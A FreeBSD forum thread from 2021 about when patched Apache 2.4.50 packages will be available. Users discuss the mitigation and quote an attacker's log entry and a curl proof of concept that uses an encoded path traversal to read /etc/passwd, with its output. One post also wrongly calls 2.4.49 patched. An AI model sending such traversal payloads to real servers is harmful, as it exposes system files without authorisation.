Availability Apache 2.4.50 as package

hbauer · Oct 5, 2021

Based on previous situations like this when can we expect to get the new 2.4.50 Apache server in the pkg repos?

Alexander88207 · Oct 5, 2021

Hello hbauer,

the newer version have been committed to the latest and the default (quarterly repo) 10 hours ago.

A package with the new version is expected in a week or less.

SirDice · Oct 5, 2021

A new quarterly branch was just made, it's going to take a while to get that to build on various different versions and architectures. Meanwhile latest is churning away on the build clusters nearly constantly too.

You can keep track of the builds on https://ci.freebsd.org/ and https://pkg-status.freebsd.org/

Once the builds are completed they have to be synced to the mirrors, that's going to take a bit of time too, there's quite a lot to sync up now.

richardtoohey2 · Oct 5, 2021

I've got a few servers being hit by this already from quite a few IPs - so it's definitely out there - the default Apache config seems to protect against the attack with "Require all denied" on the root directory.

But if that's not enough please say so!

Tieks · Oct 5, 2021

Many attempts indeed, since a few hours.
From httpd-access.log: 167.71.13.196 - - [05/Oct/2021:21:05:25 +0200] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 403 199
From httpd-error.log: [Tue Oct 05 21:05:25.362825 2021] [authz_core:error] [pid 12127] [client 167.71.13.196:19272] AH01630: client denied by server configuration: /etc/hosts

_martin · Oct 5, 2021

Yop, if you can't find any PoC anywhere looking at your logs is a good place to start.

 curl http://172.31.1.200//cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

# $FreeBSD$

#

root:*:0:0:Charlie &:/root:/bin/csh

toor:*:0:0:Bourne-again Superuser:/root:

As you mentioned Tieks, doesn't work on a default installation.
Bug fix is here. Already in ports.

SirDice · Oct 5, 2021

If you want that new version NOW, build it from ports. The port has been updated already.

Tieks · Oct 6, 2021

_martin said:
doesn't work on a default installation.

Correct. The new port version is 2.4.50. I'm running 2.4.49, that version has the security update too. See http://httpd.apache.org/security/vulnerabilities_24.html for details.
As richardtoohey2 already pointed out, setting "require all denied" blocks it. So you need to have that setting in place on older versions.

An attacker needs to guess the name of a subdirectory to docroot and the number of directories to go up. So this is yet another good case for using non-standard directory names.

_martin · Oct 6, 2021

It's about the security set on / (default is ok) and possibly other directories used, not about the directory names. Crawler can resolve the directory name fairly easy.
But yeah, as I said above, already in ports.

richardtoohey2 · Oct 8, 2021

2.4.50 has issues, there's a 2.4.51 already: https://dlcdn.apache.org//httpd/CHANGES_2.4.51

It's in FreeBSD ports.

Availability Apache 2.4.50 as package

hbauer

Alexander88207

Enthusiast

SirDice

Administrator

richardtoohey2

Tieks

_martin

SirDice

Administrator

Tieks

_martin

richardtoohey2